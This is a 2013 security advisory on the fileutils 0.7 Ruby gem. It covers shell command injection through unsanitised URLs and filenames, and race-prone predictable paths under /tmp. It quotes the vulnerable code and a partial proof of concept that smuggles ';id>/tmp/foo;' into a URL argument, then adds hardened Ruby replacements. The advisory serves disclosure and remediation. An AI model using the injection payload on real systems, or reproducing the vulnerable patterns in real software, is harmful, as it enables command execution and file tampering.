Advisory #: 36
Title: Fileutils 0.7 Ruby Gem remote command execution and insecure file handling in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2013-02-24
Download Site:
Vendor: Stefaan Colman
Vendor Notified: 2013-02-24
Vendor Contact:
Description: A set of utility classes to extract meta data from different file types.
Insecure file handling in /tmp: for each file extension, say 'zip', the gem creates a working directory under /tmp with a predictable name and manipulates files there. Because the name is predictable and the directory is created without any ownership or exclusivity check, a malicious local user can pre-create or hijack that directory and manipulate its contents. In ./lib/file_utils.rb:

15 def zip (target, *sources)
16   targetdir = "#{FileUtils::Config.tmp_dir}/zip"
17   id = 1
18   while File.exists?(targetdir)
19     targetdir = "#{FileUtils::Config.tmp_dir}/zip#{id}"
20     id += 1
21   end
22   FileUtils.mkdir(targetdir)

where Config.tmp_dir is /tmp, in ./lib/file_utils/config.rb:

5 def self.tmp_dir
6   @tmp_dir ||= '/tmp'
7 end

Remote command execution: file_utils.rb does not sanitize URLs before passing them to CutyCapt for execution. The command line is assembled as a single string and run with backticks, so the shell interprets it. If a URL contains shell metacharacters, say a ';' followed by a command, a remote attacker can execute commands on the client's system if the user is enticed into processing a URL such as (need to test URL encoding, not sure if this is valid): ;id>/tmp/o;

7 def capture (url, target)
8   command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}")
9   `#{command}`
10 end

Partial PoC, if the client is tricked into using a malicious URL:

irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=;id>/tmp/foo; --out=/tmp/tempf`
xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# ls -l /tmp/foo
-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# cat /tmp/foo
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#

Michael Scherer of found other issues during a discussion about the above issues I found:

1.) In fact, there is the same similar problem in another file:

result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb (a quick command line to type Ruby snippets), and yes, using funky chars results in funky results.

2.) There is another issue in

# Generates a temp filepath for the given extension
def temp (extension)
  path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
  id = 1
  while File.exists?(path)
    path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
    id += 1
  end

since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file.

Details for the above vulnerabilities:

(1) In file_utils.rb the /tmp file issue is between lines 86 - 92:

86 def temp (extension)
87   path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
88   id = 1
89   while File.exists?(path)
90     path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
91     id += 1
92   end

(2) In ./lib/file_utils/open_office.rb, line 27: if the filename being converted contains characters like ';', a command can be injected as well.

27 result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`
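The two weaknesses described above (a shell command assembled from attacker-influenced strings, and predictable "check then use" paths under /tmp) have standard fixes in the Ruby standard library. The following is an added example written for this advisory, not code from the fileutils gem or its author: it shows the hardened forms side by side with what they replace. The module name SafeFileUtils, the cutycapt_path argument and the TMP_PREFIX value are assumptions for illustration; the gem's real classes are FileUtils::Config and friends as quoted above.

```ruby
# Added example, not code from the fileutils gem: hardened replacements for the
# patterns the advisory describes, using only the Ruby standard library.
# SafeFileUtils, cutycapt_path and TMP_PREFIX are illustrative assumptions.
require 'uri'
require 'tmpdir'
require 'tempfile'
require 'open3'

module SafeFileUtils
  TMP_PREFIX = 'fileutils-'

  # Accept only absolute http(s) URLs that parse under Ruby's RFC 3986 parser.
  # Characters outside the URI grammar ('>' as in the PoC, spaces, newlines)
  # make URI.parse raise, so the URL is rejected before any process is spawned.
  def self.valid_http_url?(url)
    uri = URI.parse(url.to_s)
    %w[http https].include?(uri.scheme) && !uri.host.to_s.empty?
  rescue URI::InvalidURIError
    false
  end

  # Build the CutyCapt invocation as an argv array rather than one string.
  # With several arguments, system/Open3 exec the program directly and never
  # hand the line to /bin/sh, so a ';' inside the URL or the target path stays
  # a literal character of that single argument.
  def self.capture_argv(cutycapt_path, url, target)
    raise ArgumentError, "refusing non-http(s) URL: #{url.inspect}" unless valid_http_url?(url)
    [cutycapt_path, '--min-width=1024', '--min-height=768',
     "--url=#{url}", "--out=#{target}"]
  end

  # Run the capture without a shell; returns [combined_output, Process::Status].
  def self.capture(cutycapt_path, url, target)
    Open3.capture2e(*capture_argv(cutycapt_path, url, target))
  end

  # Replaces the predictable "/tmp/zip", "/tmp/zip1", ... scheme. Dir.mktmpdir
  # creates a randomly named directory atomically with mode 0700, so another
  # local user cannot pre-create it or plant files in it. The caller removes it
  # when done (or uses the block form of Dir.mktmpdir, which does that itself).
  def self.work_dir(kind)
    Dir.mktmpdir("#{TMP_PREFIX}#{kind}-")
  end

  # Replaces the "File.exists? then use" temp path scheme. Tempfile.create opens
  # the file with O_CREAT|O_EXCL and mode 0600, so a symlink planted between an
  # existence check and the write cannot redirect output to an arbitrary file.
  # The file is left in place for the caller, which writes to it and removes it.
  def self.temp_path(extension)
    file = Tempfile.create([TMP_PREFIX, ".#{extension}"])
    file.close
    file.path
  end
end

if $PROGRAM_NAME == __FILE__
  url = 'http://example.com/;id'
  puts "valid? #{SafeFileUtils.valid_http_url?(url)}"
  puts SafeFileUtils.capture_argv('/opt/CutyCapt/CutyCapt', url, '/tmp/out.png').inspect
  dir = SafeFileUtils.work_dir('zip')
  puts "work dir #{dir} mode #{format('%o', File.stat(dir).mode & 0o777)}"
  Dir.rmdir(dir)
end
```

In the gem, capture would replace the backtick string in file_utils.rb line 9 (and the same argv form applies to the OpenOffice invocation on open_office.rb line 27), while work_dir and temp_path would replace the path construction in zip and temp. The argv form is the important part: validating the URL is defence in depth, but even a metacharacter that passes validation can no longer reach a shell.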
Exploit Code:
Screen Shots: